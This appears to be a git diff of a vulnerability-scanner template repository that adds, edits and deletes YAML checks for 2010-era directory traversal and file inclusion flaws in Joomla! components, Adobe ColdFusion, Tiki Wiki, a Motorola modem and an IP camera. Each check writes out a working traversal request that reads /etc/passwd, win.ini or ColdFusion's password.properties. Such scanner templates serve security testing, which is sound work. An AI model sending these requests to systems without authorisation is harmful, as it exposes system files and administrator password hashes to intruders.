+ +# Enhanced by mp on 2022/03/01 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1858.yaml b/nuclei-templates/CVE-2010/CVE-2010-1858.yaml new file mode 100644 index 0000000000..6b922c1303 --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-1858.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-1858 + +info: + name: Joomla! Component SMEStorage - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the SMEStorage (com_smestorage) component before 1.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/11853 + - https://www.cvedetails.com/cve/CVE-2010-1858 + - http://www.securityfocus.com/bid/38911 + - http://packetstormsecurity.org/1003-exploits/joomlasmestorage-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1858 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/15 diff --git a/nuclei-templates/CVE-2010/cve-2010-1870.yaml b/nuclei-templates/CVE-2010/CVE-2010-1870.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1870.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1870.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1952.yaml b/nuclei-templates/CVE-2010/CVE-2010-1952.yaml index 33bb5efa53..5e71f4a39f 100644 --- a/nuclei-templates/CVE-2010/CVE-2010-1952.yaml +++ b/nuclei-templates/CVE-2010/CVE-2010-1952.yaml @@ -4,27 +4,24 @@ info: name: Joomla! Component BeeHeard 1.0 - Local File Inclusion author: daffainfo severity: high - description: A directory traversal vulnerability in the BeeHeard (com_beeheard) and BeeHeard Lite (com_beeheardlite) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: Directory traversal vulnerability in the BeeHeard (com_beeheard) and BeeHeard Lite (com_beeheardlite) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12239 - https://www.cvedetails.com/cve/CVE-2010-1952 - - http://secunia.com/advisories/39475 - - http://www.exploit-db.com/exploits/12239 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1952 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - 200 -# Enhanced by mp on 2022/02/15 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1953.yaml b/nuclei-templates/CVE-2010/CVE-2010-1953.yaml new file mode 100644 index 0000000000..5a2a33c919 --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-1953.yaml @@ -0,0 +1,31 @@ +id: CVE-2010-1953 + +info: + name: Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12288 + - https://www.cvedetails.com/cve/CVE-2010-1953 + - http://www.vupen.com/english/advisories/2010/0927 + - http://www.exploit-db.com/exploits/12288 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1953 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/15 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1954.yaml b/nuclei-templates/CVE-2010/CVE-2010-1954.yaml deleted file mode 100644 index 67e4710e8c..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1954.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2010-1954 - -info: - name: Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12287 - - https://www.cvedetails.com/cve/CVE-2010-1954 - - http://www.securityfocus.com/bid/39552 - - http://www.exploit-db.com/exploits/12287 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1954 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/15 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1955.yaml b/nuclei-templates/CVE-2010/CVE-2010-1955.yaml deleted file mode 100644 index bdb1172ecd..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1955.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2010-1955 - -info: - name: Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12238 - - https://www.cvedetails.com/cve/CVE-2010-1955 - - http://www.securityfocus.com/bid/39508 - - http://secunia.com/advisories/39473 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1955 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/15 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1956.yaml b/nuclei-templates/CVE-2010/CVE-2010-1956.yaml deleted file mode 100644 index 15d2026732..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1956.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2010-1956 - -info: - name: Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Gadget Factory (com_gadgetfactory) component 1.0.0 and 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12285 - - https://www.cvedetails.com/cve/CVE-2010-1956 - - http://secunia.com/advisories/39522 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1956 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/15 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1977.yaml b/nuclei-templates/CVE-2010/CVE-2010-1977.yaml index a28a59056f..71de2a9492 100644 --- a/nuclei-templates/CVE-2010/CVE-2010-1977.yaml +++ b/nuclei-templates/CVE-2010/CVE-2010-1977.yaml @@ -4,15 +4,10 @@ info: name: Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion author: daffainfo severity: high - description: A directory traversal vulnerability in the J!WHMCS Integrator (com_jwhmcs) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: Directory traversal vulnerability in the J!WHMCS Integrator (com_jwhmcs) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12083 - https://www.cvedetails.com/cve/CVE-2010-1977 - - http://www.securityfocus.com/bid/39243 - - http://secunia.com/advisories/39356 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1977 tags: cve,cve2010,joomla,lfi requests: @@ -25,10 +20,8 @@ requests: - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" - type: status status: - - 200 - -# Enhanced by mp on 2022/02/16 + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/CVE-2010-1979.yaml b/nuclei-templates/CVE-2010/CVE-2010-1979.yaml index 3b1f768585..00cab2ad0f 100644 --- a/nuclei-templates/CVE-2010/CVE-2010-1979.yaml +++ b/nuclei-templates/CVE-2010/CVE-2010-1979.yaml @@ -4,14 +4,10 @@ info: name: Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion author: daffainfo severity: high - description: A directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12088 - https://www.cvedetails.com/cve/CVE-2010-1979 - - http://secunia.com/advisories/39360 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1979 tags: cve,cve2010,joomla,lfi requests: @@ -24,10 +20,8 @@ requests: - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" - type: status status: - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/cve-2010-1980.yaml b/nuclei-templates/CVE-2010/CVE-2010-1980.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1980.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1980.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1981.yaml b/nuclei-templates/CVE-2010/CVE-2010-1981.yaml new file mode 100644 index 0000000000..00c934810c --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-1981.yaml @@ -0,0 +1,34 @@ +id: CVE-2010-1981 + +info: + name: Joomla! Component Fabrik 2.0 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12087 + - https://www.cvedetails.com/cve/CVE-2010-1981 + - http://packetstormsecurity.org/1004-exploits/joomlafabrik-lfi.txt + - http://www.exploit-db.com/exploits/12087 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1981 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1983.yaml b/nuclei-templates/CVE-2010/CVE-2010-1983.yaml deleted file mode 100644 index 48292064e9..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1983.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2010-1983 - -info: - name: Joomla! Component redTWITTER 1.0 - Local File Inclusion - author: daffainfo - severity: high - description: A drectory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12055 - - https://www.cvedetails.com/cve/CVE-2010-1983 - - http://packetstormsecurity.org/1004-exploits/joomlaredtwitter-lfi.txt - - http://www.exploit-db.com/exploits/12055 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1983 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-2033.yaml b/nuclei-templates/CVE-2010/CVE-2010-2033.yaml deleted file mode 100644 index 4e0eed3c3d..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-2033.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2010-2033 - -info: - name: Joomla Percha Categories Tree 0.6 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html - - https://www.cvedetails.com/cve/CVE-2010-2033 - - http://secunia.com/advisories/39873 - - http://www.securityfocus.com/bid/40244 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-2033 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-2034.yaml b/nuclei-templates/CVE-2010/CVE-2010-2034.yaml deleted file mode 100644 index 80fa7717b0..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-2034.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2010-2034 - -info: - name: Joomla! Component Percha Image Attach 1.1 - Directory Traversal - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Percha Image Attach (com_perchaimageattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/34003 - - https://www.cvedetails.com/cve/CVE-2010-2034 - - http://packetstormsecurity.org/1005-exploits/joomlaperchaia-lfi.txt - - http://www.securityfocus.com/bid/40244 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-2034 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-2035.yaml b/nuclei-templates/CVE-2010/CVE-2010-2035.yaml deleted file mode 100644 index 25cefc0e1a..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-2035.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2010-2035 - -info: - name: Joomla! Component Percha Gallery 1.6 Beta - Directory Traversal - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Percha Gallery (com_perchagallery) component 1.6 Beta for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/34006 - - https://www.cvedetails.com/cve/CVE-2010-2035 - - http://www.securityfocus.com/bid/40244 - - http://packetstormsecurity.org/1005-exploits/joomlaperchagl-lfi.txt - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-2035 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-2037.yaml b/nuclei-templates/CVE-2010/CVE-2010-2037.yaml new file mode 100644 index 0000000000..0ec135d12a --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-2037.yaml @@ -0,0 +1,34 @@ +id: CVE-2010-2037 + +info: + name: Joomla! Component Percha Downloads Attach 1.1 - Directory Traversal + author: daffainfo + severity: high + description: A directory traversal vulnerability in the Percha Downloads Attach (com_perchadownloadsattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/34005 + - https://www.cvedetails.com/cve/CVE-2010-2037 + - http://www.securityfocus.com/bid/40244 + - http://packetstormsecurity.org/1005-exploits/joomlaperchada-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2037 + tags: cve,cve2010,lfi,joomla + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-2122.yaml b/nuclei-templates/CVE-2010/CVE-2010-2122.yaml deleted file mode 100644 index 55fdfe4f10..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-2122.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2010-2122 - -info: - name: Joomla! Component simpledownload <=0.9.5 - Arbitrary File Retrieval - author: daffainfo - severity: high - description: A directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to retrieve arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12623 - - https://www.cvedetails.com/cve/CVE-2010-2122 - - https://www.exploit-db.com/exploits/12618 - - http://www.securityfocus.com/bid/40192 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-2122 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-2128.yaml b/nuclei-templates/CVE-2010/CVE-2010-2128.yaml deleted file mode 100644 index 1237eb6309..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-2128.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2010-2128 - -info: - name: Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the JE Quotation Form (com_jequoteform) component 1.0b1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12607 - - https://www.cvedetails.com/cve/CVE-2010-2128 - - http://secunia.com/advisories/39832 - - http://www.exploit-db.com/exploits/12607 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-2128 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-2259.yaml b/nuclei-templates/CVE-2010/CVE-2010-2259.yaml deleted file mode 100644 index 0d1cebd3bb..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-2259.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2010-2259 - -info: - name: Joomla! Component com_bfsurvey - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/10946 - - https://www.cvedetails.com/cve/CVE-2010-2259 - - http://secunia.com/advisories/37866 - - http://www.exploit-db.com/exploits/10946 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-2259 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-2307.yaml b/nuclei-templates/CVE-2010/CVE-2010-2307.yaml deleted file mode 100644 index 8ee4309fff..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-2307.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2010-2307 - -info: - name: Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal - author: daffainfo - severity: high - description: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request. - reference: - - https://www.securityfocus.com/bid/40550/info - - https://nvd.nist.gov/vuln/detail/CVE-2010-2307 - - http://www.osvdb.org/65249 - - https://www.exploit-db.com/exploits/12865 - remediation: Upgrade to a supported product version. - classification: - cve-id: CVE-2010-2307 - tags: cve,cve2010,iot,lfi,motorola - -requests: - - method: GET - path: - - "{{BaseURL}}/../../etc/passwd" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-2857.yaml b/nuclei-templates/CVE-2010/CVE-2010-2857.yaml index 8450d34103..1478adabab 100644 --- a/nuclei-templates/CVE-2010/CVE-2010-2857.yaml +++ b/nuclei-templates/CVE-2010/CVE-2010-2857.yaml @@ -4,15 +4,10 @@ info: name: Joomla! Component Music Manager - Local File Inclusion author: daffainfo severity: high - description: A directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the cid parameter to album.html. - reference: + description: Directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the cid parameter to album.html. + reference: | - https://www.exploit-db.com/exploits/14274 - https://www.cvedetails.com/cve/CVE-2010-2857 - - http://www.securityfocus.com/bid/41485 - - http://www.exploit-db.com/exploits/14274 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-2857 tags: cve,cve2010,joomla,lfi requests: @@ -25,10 +20,8 @@ requests: - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" - type: status status: - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-2861.yaml b/nuclei-templates/CVE-2010/CVE-2010-2861.yaml new file mode 100644 index 0000000000..5b56103782 --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-2861.yaml @@ -0,0 +1,38 @@ +id: CVE-2010-2861 + +info: + name: Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI + author: pikpikcu + severity: high + description: Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/. + reference: + - https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861 + - http://www.adobe.com/support/security/bulletins/apsb10-18.html + - http://securityreason.com/securityalert/8148 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2861 + metadata: + shodan-query: http.component:"Adobe ColdFusion" + tags: cve,cve2010,coldfusion,lfi,adobe + +requests: + - method: GET + path: + - "{{BaseURL}}/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en" + + matchers-condition: and + matchers: + + - type: word + words: + - "rdspassword=" + - "encrypted=" + part: body + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-2920.yaml b/nuclei-templates/CVE-2010/CVE-2010-2920.yaml index 67f0851855..48974bc25f 100644 --- a/nuclei-templates/CVE-2010/CVE-2010-2920.yaml +++ b/nuclei-templates/CVE-2010/CVE-2010-2920.yaml @@ -4,14 +4,10 @@ info: name: Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion author: daffainfo severity: high - description: A directory traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component 1.5.1.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + description: Directory traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component 1.5.1.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12120 - https://www.cvedetails.com/cve/CVE-2010-2920 - - http://www.vupen.com/english/advisories/2010/1844 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-2920 tags: cve,cve2010,joomla,lfi requests: @@ -24,10 +20,8 @@ requests: - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" - type: status status: - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-3426.yaml b/nuclei-templates/CVE-2010/CVE-2010-3426.yaml deleted file mode 100644 index 9a7401132f..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-3426.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2010-3426 - -info: - name: Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/14964 - - https://www.cvedetails.com/cve/CVE-2010-3426 - - http://packetstormsecurity.org/1009-exploits/joomlajphone-lfi.txt - - http://www.exploit-db.com/exploits/14964 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-3426 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-4231.yaml b/nuclei-templates/CVE-2010/CVE-2010-4231.yaml index 3c77231b1e..58e8e65051 100644 --- a/nuclei-templates/CVE-2010/CVE-2010-4231.yaml +++ b/nuclei-templates/CVE-2010/CVE-2010-4231.yaml @@ -4,15 +4,10 @@ info: name: Camtron CMNC-200 IP Camera - Directory Traversal author: daffainfo severity: high - description: The CMNC-200 IP Camera has a built-in web server that is vulnerable to directory transversal attacks, allowing access to any file on the camera file system. + description: The CMNC-200 IP Camera has a built-in web server that is enabled by default. The server is vulnerable to directory transversal attacks, allowing access to any file on the camera file system. reference: - https://nvd.nist.gov/vuln/detail/CVE-2010-4231 - https://www.exploit-db.com/exploits/15505 - - https://www.trustwave.com/spiderlabs/advisories/TWSL2010-006.txt - - http://www.exploit-db.com/exploits/15505/ - remediation: Upgrade to a supported product version. - classification: - cve-id: CVE-2010-4231 tags: cve,cve2010,iot,lfi,camera requests: @@ -24,10 +19,8 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" - type: status status: - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-4239.yaml b/nuclei-templates/CVE-2010/CVE-2010-4239.yaml deleted file mode 100644 index c2b4d8c476..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-4239.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2010-4239 - -info: - name: Tiki Wiki CMS Groupware 5.2 - Local File Inclusion - author: 0x_akoko - severity: critical - description: Tiki Wiki CMS Groupware 5.2 is susceptible to a local file inclusion vulnerability. - reference: - - https://dl.packetstormsecurity.net/1009-exploits/tikiwiki52-lfi.txt - - https://www.openwall.com/lists/oss-security/2010/11/22/9 - - https://security-tracker.debian.org/tracker/CVE-2010-4239 - - https://nvd.nist.gov/vuln/detail/CVE-2010-4239 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2010-4239 - cwe-id: CWE-20 - tags: cve,cve2010,tikiwiki,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini" - - matchers: - - type: word - part: body - words: - - "bit app support" - - "fonts" - - "extensions" - condition: and - -# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2010/CVE-2010-4282.yaml b/nuclei-templates/CVE-2010/CVE-2010-4282.yaml deleted file mode 100644 index 527fe7df51..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-4282.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2010-4282 - -info: - name: phpShowtime 2.0 - Directory Traversal - author: daffainfo - severity: high - description: Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and 